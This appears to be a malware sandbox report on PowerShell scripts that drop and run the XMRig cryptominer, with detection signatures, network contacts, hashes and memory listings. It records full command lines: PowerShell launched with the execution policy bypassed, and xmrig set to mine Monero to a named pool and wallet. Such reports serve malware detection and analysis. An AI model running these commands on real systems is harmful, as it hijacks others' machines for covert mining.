| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3032 wrote to memory of 776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3032 wrote to memory of 776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3032-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht54pq22.wxa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3032-9-0x000001A49D320000-0x000001A49D342000-memory.dmp
memory/3032-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/3032-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/3032-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/3032-14-0x000001A49D4E0000-0x000001A49D4F2000-memory.dmp
memory/3032-15-0x000001A49D4C0000-0x000001A49D4CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/776-46-0x0000019FD5A20000-0x0000019FD5A40000-memory.dmp
memory/776-47-0x0000019FD5A70000-0x0000019FD5A90000-memory.dmp
memory/3032-49-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/776-48-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/3032-50-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp
memory/3032-51-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/776-54-0x0000019FD5AB0000-0x0000019FD5AD0000-memory.dmp
memory/776-53-0x0000019FD5A90000-0x0000019FD5AB0000-memory.dmp
memory/776-52-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/3032-55-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp
memory/776-56-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-57-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-58-0x0000019FD5A90000-0x0000019FD5AB0000-memory.dmp
memory/776-59-0x0000019FD5AB0000-0x0000019FD5AD0000-memory.dmp
memory/776-60-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-61-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-62-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-63-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-64-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-65-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-66-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-67-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-68-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-69-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-70-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-71-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-72-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-73-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-74-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-75-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-76-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-77-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-78-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-79-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-80-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-81-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-82-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-83-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-84-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-85-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-86-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-87-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-88-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-89-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-90-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-91-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-92-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-93-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-94-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-95-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-96-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-97-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-98-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-99-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-100-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-101-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-102-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-103-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-104-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-105-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-106-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-107-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-108-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-109-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-110-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-111-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-112-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-113-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-114-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-115-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-116-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-117-0x00007FF641200000-0x00007FF641E33000-memory.dmp
memory/776-118-0x00007FF641200000-0x00007FF641E33000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:53
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1771s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1896 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1896 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/1896-0-0x00007FF863053000-0x00007FF863055000-memory.dmp
memory/1896-1-0x000001BC57430000-0x000001BC57452000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppacifep.hrt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1896-11-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/1896-12-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/1896-13-0x00007FF863053000-0x00007FF863055000-memory.dmp
memory/1896-14-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/1896-15-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/1896-17-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/1896-18-0x000001BC57F00000-0x000001BC57F12000-memory.dmp
memory/1896-19-0x000001BC57EE0000-0x000001BC57EEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3512-50-0x00000284EBEB0000-0x00000284EBED0000-memory.dmp
memory/3512-51-0x00000284ED7B0000-0x00000284ED7D0000-memory.dmp
memory/3512-52-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-54-0x00000284ED7F0000-0x00000284ED810000-memory.dmp
memory/3512-53-0x00000284ED7D0000-0x00000284ED7F0000-memory.dmp
memory/3512-55-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-56-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/1896-57-0x00007FF863050000-0x00007FF863B11000-memory.dmp
memory/3512-58-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-59-0x00000284ED7D0000-0x00000284ED7F0000-memory.dmp
memory/3512-60-0x00000284ED7F0000-0x00000284ED810000-memory.dmp
memory/3512-61-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-62-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-63-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-64-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-65-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-66-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-67-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-68-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-69-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-70-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-71-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-72-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-73-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-74-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-75-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-76-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-77-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-78-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-79-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-80-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-81-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-82-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-83-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-84-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-85-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-86-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-87-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-88-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-89-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-90-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-91-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-92-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-93-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-94-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-95-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-96-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-97-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-98-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-99-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-100-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-101-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-102-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-103-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-104-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-105-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-106-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-107-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-108-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-109-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-110-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-111-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-112-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-113-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-114-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-115-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-116-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-117-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-118-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
memory/3512-119-0x00007FF6C0750000-0x00007FF6C1383000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2468 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
